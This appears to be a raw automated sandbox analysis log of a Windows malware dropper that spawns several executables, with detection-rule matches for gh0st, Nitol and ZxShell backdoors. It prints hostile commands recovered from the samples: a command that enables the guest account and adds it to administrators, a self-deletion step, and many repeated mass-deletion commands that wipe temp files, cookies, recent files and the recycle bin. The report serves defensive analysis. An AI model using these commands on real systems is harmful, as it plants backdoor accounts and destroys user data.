              Source: C:\Windows\Temp\server.exeCode function: 3_2_100505F73_2_100505F7
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10041DF03_2_10041DF0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10040E003_2_10040E00
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10037E103_2_10037E10
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100386103_2_10038610
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001DE403_2_1001DE40
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001D6503_2_1001D650
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10038E503_2_10038E50
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10022E603_2_10022E60
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10064E703_2_10064E70
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001568D3_2_1001568D
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003B6903_2_1003B690
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003C6A03_2_1003C6A0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100656D03_2_100656D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10066EE03_2_10066EE0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10033EF03_2_10033EF0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003F7003_2_1003F700
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10057F203_2_10057F20
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100137303_2_10013730
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10063F303_2_10063F30
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100637603_2_10063760
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10046F903_2_10046F90
              Source: C:\Windows\Temp\server.exeCode function: 3_2_10040FC03_2_10040FC0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1001BFD03_2_1001BFD0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_1003A7D03_2_1003A7D0
              Source: C:\Windows\Temp\server.exeCode function: 3_2_100287F03_2_100287F0
              Source: C:\Windows\Temp\v5.exeCode function: 4_2_004074704_2_00407470
              Source: C:\Windows\Temp\ .exeCode function: 5_2_004330205_2_00433020
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00458C585_2_00458C58
              Source: C:\Windows\Temp\ .exeCode function: 5_2_004526555_2_00452655
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00447B9C5_2_00447B9C
              Source: C:\Windows\Temp\ .exeCode function: 5_2_0044DDAB5_2_0044DDAB
              Source: C:\Windows\Temp\ .exeCode function: 5_2_00443ED85_2_00443ED8
              Source: C:\Windows\Temp\ .exe | Code function: String function: 00401B10 appears 2588 times
              Source: C:\Windows\Temp\ .exe | Code function: String function: 0044991C appears 59 times
              Source: C:\Windows\Temp\ .exe | Code function: String function: 00456F8E appears 53 times
              Source: C:\Windows\Temp\ .exe | Code function: String function: 00454F3B appears 2661 times
              Source: C:\Windows\Temp\ .exe | Code function: String function: 00459697 appears 31 times
              Source: C:\Windows\Temp\ .exe | Code function: String function: 004483B0 appears 122 times
              Source: G3izWAY3Fa.exe, 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
              Source: G3izWAY3Fa.exe, 00000000.00000002.1384775691.00000000031AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
              Source: G3izWAY3Fa.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: dump.pcap, type: PCAP | Matched rule: gh0st author = https://github.com/jackcr/
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
              Source: 00000003.00000002.3339534621.0000000001FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: gh0st author = https://github.com/jackcr/
              Source: 00000003.00000002.3363429748.0000000002A7D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY | Matched rule: gh0st author = https://github.com/jackcr/
              Source: v5.exe, 00000002.00000002.1384463004.0000000002DFC000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: .vBP%
              Source: classification engine | Classification label: mal78.spre.bank.troj.spyw.evad.winEXE@155/6@4/3
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_0043A410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,InitiateSystemShutdownA
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
              Source: C:\Windows\Temp\ .exe | Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
              Source: C:\Windows\Temp\server.exe | Code function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar
              Source: C:\Windows\Temp\v5.exe | Code function: 2_2_00405244 LoadLibraryA,6CFC6DE0,FindResourceA,LoadResource,LockResource,wsprintfA,WriteFile,WriteFile,SetFilePointer,lstrlen,WriteFile,CloseHandle
              Source: C:\Windows\Temp\v5.exe | Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess
              Source: C:\Windows\Temp\v5.exe | Code function: 4_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
              Source: C:\Windows\Temp\v5.exe | Mutant created: \BaseNamedObjects\Defghi Klmnopqr Tuv
              Source: C:\Windows\Temp\server.exe | Mutant created: \Sessions\1\BaseNamedObjects\AAAAAArrGvvbOnvbCzvbGwsKmnr6+vnw==
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | File created: C:\Users\user\AppData\Local\Temp\nsf2983.tmp
              Source: G3izWAY3Fa.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: G3izWAY3Fa.exe | ReversingLabs: Detection: 86%
              Source: server.exe | String found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | File read: C:\Users\user\Desktop\G3izWAY3Fa.exe
              Source: unknown | Process created: C:\Users\user\Desktop\G3izWAY3Fa.exe "C:\Users\user\Desktop\G3izWAY3Fa.exe"
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
              Source: unknown | Process created: C:\Windows\Temp\v5.exe C:\Windows\temp\v5.exe
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
              Source: C:\Windows\Temp\v5.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
              Source: C:\Windows\Temp\v5.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
              Source: C:\Windows\Temp\ .exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: acgenral.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: samcli.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: msacm32.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\G3izWAY3Fa.exe | Section loaded: dwmapi.dll
